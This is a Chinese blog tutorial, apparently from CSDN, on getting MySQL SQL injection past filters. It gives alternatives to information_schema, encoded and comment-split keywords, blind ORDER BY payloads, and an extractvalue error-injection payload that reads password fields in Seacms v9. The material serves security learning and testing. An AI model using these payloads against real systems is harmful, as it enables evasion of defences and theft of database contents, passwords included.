绕过信息过滤与注入限制

最新推荐文章于 2025-08-18 15:06:57 发布
原创 最新推荐文章于 2025-08-18 15:06:57 发布 · 628 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#oracle #数据库

绕过 information_schema 过滤

information_schema 是 MySQL 中存储元数据的系统数据库,常用于 SQL 注入中获取表名、列名等信息。当 information_schema 被过滤时,可以通过以下方法绕过。

1 替代视图

使用 sys 库(MySQL 5.7+)

sys 库是 MySQL 5.7 及以上版本提供的系统库,包含丰富的元数据信息。

数据库中:SELECT table_name FROM sys.schema_auto_increment_columns 
WHERE table_schema = DATABASE();

mysql.innodb_table_stats 表存储了 InnoDB 表的统计信息,可用于获取表名

数据库中:SELECT table_name FROM mysql.innodb_table_stats 
WHERE database_name = DATABASE();

2 编码混淆

通过编码混淆关键字,可以绕过简单的字符串过滤。

方法eg
URL%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61
Unicodeinformation\u005f_schema
十六进制0x696e666f726d6174696f6e5f736368656d61

3 语法变形

通过语法变形,可以绕过对关键字的直接过滤。

内联注释绕过

数据库中:

SELECT table_name FROM /*!information_schema*/.tables;

关键字分割

数据库中:

SELECT table_name FROM information/**/_schema.tables;

绕过 ORDER BY 注入限制

ORDER BY 注入是一种常见的 SQL 注入类型,通常用于盲注场景。以下是几种绕过限制的方法。

1 联合查询注入

通过联合查询,可以直接获取数据。

2 盲注技术类型

布尔盲注ORDER BY IF(ASCII(SUBSTR(DATABASE(),1,1))=97,1,2)
时间盲注ORDER BY IF(ASCII(SUBSTR(DATABASE(),1,1))=97,SLEEP(5),1)
正则匹配ORDER BY (SELECT table_name) REGEXP '^a'

3 分页提取数据

通过 LIMIT 和 OFFSET 分页提取数据

数据库中:

ORDER BY (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0);

Seacmsv9 报错注入:

Seacmsv9 是一款常见的内容管理系统,曾存在报错注入漏洞。以下是漏洞利用过程与分析。

1 漏洞利用过程

通过构造恶意请求触发报错注入。

2 报错结果分析

成功回显数据库名

密码字段截断处理

通过 MID() 函数分段读取密码字段

数据库中:extractvalue(1,concat_ws(0x20,0x5c,mid((SELECT password),1,30)))

3 常见问题排查

权限不足

字段过长

特殊字符

mysql 注入 information_schema_绕过IDS过滤information_schema继续注入
weixin_35867608的博客
02-07 1261
原文:绕过IDS过滤information_schema继续注入//利用MySQL出错爆出字段mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;ERROR 1060 (42S21): Duplicate column name 'Host'mysql> SELECT * FROM (SELECT * FROM user ...
SQL注入技术详解过滤绕过方法
Cyc1e的博客
11-07 2078
SQL注入攻击是严重的安全威胁,可能导致数据库数据泄露或篡改。使用参数化查询或ORM框架,避免直接拼接SQL语句。对用户输入进行严格过滤和验证,限制输入的格式和范围。定期更新依赖库,修复已知的安全漏洞。然而,攻击者可能通过编码、注释、拆分关键字等方式绕过简单的防护机制。因此,开发者应使用多层次的防御方法,并定期对应用进行安全测试。
information_schema绕过方法+order by注入
qq_73831912的博客
02-26 1009
js路径:document.querySelector("body > div > font:nth-child(3) > center > font > table > tbody > tr:nth-child(14) > td:nth-child(2)")selector路径:body > div > font:nth-child(3) > center > font > table > tbody > tr:nth-child(14) > td:nth-child(2)跑代码如何判断是以哪一列排序。
关于MySQL绕过授予information_schema中对象时报ERROR 1044(4200)错误
12-14
这个问题是微信群中网友关于MySQL权限的讨论,有这么一个业务需求(下面是他的原话): 因为MySQL的很多功能都依赖主键,我想用zabbix用户,来监控业务数据库的所有表,是否都建立了主键。 监控的语句是: FROM information_schema.tables t1 LEFT OUTER JOIN information_schema.table_constraints t2 ON t1.table_schema = t2.table_schema AND t1.table_name = t2.table_name
mysql注入绕过information_schema过滤
b1ackc4t的博客
10-19 6185
1.利用mysql5.7新增的sys.schema_auto_increment_columns 这是sys数据库下的一个视图,基础数据来自information_schema,他的作用是对表的自增ID进行监控,也就是说,如果某张表存在自增ID,就可以通过该视图来获取其表名和所在数据库名 以下为该视图的所有列 2.sys.schema_table_statistics_with_buffer 这是sys数据库下的视图,里面存储着所有数据库所有表的统计信息 ...
Bypass information_schema无列名注入
qq_45521281的博客
06-09 4374
文章目录Bypass information_schema前言前置任务MySQL5.7的新特性sys.schema_auto_increment_columnsschema_table_statistics_with_buffer、x$schema_table_statistics_with_buffer无列名注入利用joinjoin … using(xx)利用普通子查询[SWPU2019]Web1——无列名注入 Bypass information_schema 前言 聊一聊mysql在被waf禁掉了in
sql注入-绕过
lza20001103的博客
03-13 963
WAF绕过--sql注入绕过
mysql注入绕过单引号_SQL注入-绕过过滤规则
weixin_28788777的博客
01-28 8719
过滤规则产生的原因前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行。这些数据我们统称为外部数据,在安全领域有一条规则:一切外部数据是不可信任的。所以我们需要通过各种方式对数据进行检测和过滤。扩展:PHP的过滤函数preg_replace(mixed $pattern , mixed...
SQL注入中空格逗号过滤绕过技巧总结
HuaweiLab_Peach的博客
03-18 1788
大家好,今天想和大家分享一些实用的技巧,专门针对渗透测试或CTF比赛中可能遇到的特殊字符过滤问题。这篇文章主要讲解当遇到空格和逗号过滤时,如何巧妙地进行绕过,让我们的SQL注入成功执行。
SQL注入技巧之显注盲注中过滤逗号绕过详析
09-09
然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行注入攻击,其中联合查询和盲注是两种主要的方式。 1. 联合查询显注绕过逗号 在传统SQL注入中,通常...
SQL注入绕过 单引号 限制继续注入
10-29
然而,简单地过滤掉单引号并不能完全防止SQL注入攻击,因为攻击者可以使用其他技巧来绕过这种限制。 文章中首先给出的是一个典型的SQL注入攻击示例: ``` //***/show.asp?id=1;exec master.dbo.xp_cmdshell '...
深入了解SQL注入绕过waf和过滤机制
05-04
本篇文章深入探讨了SQL注入攻击如何绕过WAF,提供了多种绕过方法和测试向量,旨在帮助安全从业者了解攻击者的策略,从而提升防御能力。 0x06 参考资料 为了深入了解这一主题,可以查阅更多相关文献和技术文档,...
从 ORA-12703 到顺利入库:Go + Oracle 11g GBK 字符集踩坑记20250818
Narutolxy的博客
08-18 475
在企业级开发中,字符集问题往往被忽视,却可能引发严重的系统错误。本文记录了我在 Go 1.21 + Oracle 11g(GBK 编码) 环境下,因字符集处理不当而触发 ORA-12703 错误的全过程。从最初的乱码 500 报错,到逐步排查驱动、客户端、环境变量,再到最终发现“手动转码导致二次转换冲突”的根因,并通过调整编码策略彻底解决问题。 文章不仅分享了完整的排查思路解决方案,还总结了在 Go Oracle 混合环境下的最佳实践,帮助开发者避免同类“编码黑洞”。
SAP 简单的AMDP demo 练习使用
qq_40463305的博客
08-18 304
SAP HANA是SAP开发的一种内存数据库管理系统,它具有出色的性能和处理大规模数据的能力。为了充分利用SAP HANA的性能,SAP引入了AMDP技术,以便将数据库操作推送到数据库服务器执行,从而减少数据传输和处理时间。
Oracle维护指南
最新发布
weixin_45806267的博客
08-18 199
本文全面介绍了Oracle数据库的核心技术管理实践,涵盖架构、配置、性能优化、故障诊断和安全审计等关键主题。主要内容包括:Oracle版本演进特性对比,单机RAC架构差异;数据库实例、存储结构和内存管理;日志文件类型作用;备份恢复策略RMAN工具使用;性能调优方法监控指标;常见错误诊断;以及数据库安全机制审计功能。特别强调了RAC环境的特殊配置要求,并提供了详细的SQL命令示例和最佳实践建议。通过系统化的知识梳理,帮助DBA掌握Oracle数据库全生命周期的管理技能,确保系统的高可用性和数据安
springboot项目单独对数据源配置加解密
平时的经验总结,学习历程
08-16 176
文章实现原理是实现BeanPostProcessor,这是bean创建完成后的后置处理接口,spring框架提供的入口。DataSourceProperties bean创建完成后也会调用后置处理,只需要对bean中的数据库密码重新设置就能达到要求。项目要求对数据源相关的配置,也就是数据库的密码要单独做加解密处理。引入开源框架使用现有的算法是满足不了的,行里提供了单独的算法。也就是上线的时候我们并不知道数据库密码,要通过文件解密出密码进行设置。
Spring事物
动动发财的小手点点赞
08-15 852
我在这篇文章中分享了Spring事务管理的实用经验,从为什么需要事务入手,解释了它如何确保操作的原子性,比如转账场景。接着,我详细介绍了核心概念,包括传播行为和隔离级别的表格展示,以及回滚规则。然后,我展示了如何用@Transactional注解配置事务,并举了转账代码例子。最后,我列出了事务失效的常见坑,如非public方法和类内调用问题,希望能帮大家在开发中避开雷区,更高效地处理数据库操作。
PostgreSQL——视图
吴声子夜歌的博客
08-14 1033
视图是一个虚拟表,是从数据库中一个或多个表中导出来的表。视图还可以从己经存在的视图基础上定义。视图一经定义便存储在数据库中,其相对应的数据并没有像表那样在数据库中再存储一份,通过视图看到的数据只是存放在基本表中的数据。对视图的操作对表的操作一样,可以对其进行查询、修改和删除。当对通过视图看到的数据进行修改时,相应的基本表的数据也要发生变化,同时,若基本表的数据发生变化,则这种变化也可以自动地反映到视图中。
mybatisplus oracle 数据库OracleKeyGenerator使用序列生成主键原理
曾令胜的博客
08-18 486
摘要:本文分析了MyBatis-Plus的启动流程,重点介绍了Oracle主键生成器的集成方式。在MyBatisPlusAutoConfiguration中会自动收集IKeyGenerator实现类,通过配置@Bean将OracleKeyGenerator加入IOC容器,并在实体类使用@KeySequence指定序列。文章详细追踪了SQL注入过程,从SqlSessionFactory构建到Mapper接口解析,重点说明了DefaultSqlInjector如何为Mapper接口注入基础CRUD方法,以及自定
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

JioJio~z

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值